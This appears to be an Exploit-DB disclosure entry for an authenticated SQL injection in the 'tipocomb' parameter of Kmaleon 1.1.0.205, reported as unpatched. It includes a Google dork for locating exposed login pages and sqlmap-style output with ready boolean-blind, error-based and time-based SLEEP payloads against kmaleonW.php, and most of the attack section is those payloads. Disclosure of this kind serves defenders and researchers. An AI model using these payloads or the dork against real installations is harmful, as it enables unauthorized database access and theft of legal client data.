Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)

vendor:

Kmaleon

by:

Amel BOUZIANE-LEBLOND

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Kmaleon

Affected Version From: 1.1.0.205

Affected Version To: 1.1.0.205

Patch Exists: NO

Related CWE:

CPE: a:levelprograms:kmaleon

Metasploit:

Other Scripts:

Platforms Tested: Linux

2021

Kmaleon 1.1.0.205 – ‘tipocomb’ SQL Injection (Authenticated)

The Kmaleon application from levelprogram is vulnerable to SQL injection via the 'tipocomb' parameter on the kmaleonW.php. The 'tipocomb' parameter is vulnerable to SQL injection. GET parameter 'tipocomb' is vulnerable. The back-end DBMS is MySQL.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)
# Google Dork: intitle: "Inicio de Sesión - Kmaleon"
# Date: 2021-11-05
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.levelprograms.com
# Software Link: https://www.levelprograms.com/kmaleon-abogados/
# Version: v1.1.0.205
# Tested on: Linux

# Description:
# The Kmaleon application from levelprogram is vulnerable to
# SQL injection via the 'tipocomb' parameter on the kmaleonW.php

==================== 1. SQLi ====================

http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true

The 'tipocomb' parameter is vulnerable to SQL injection.

GET parameter 'tipocomb' is vulnerable.

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0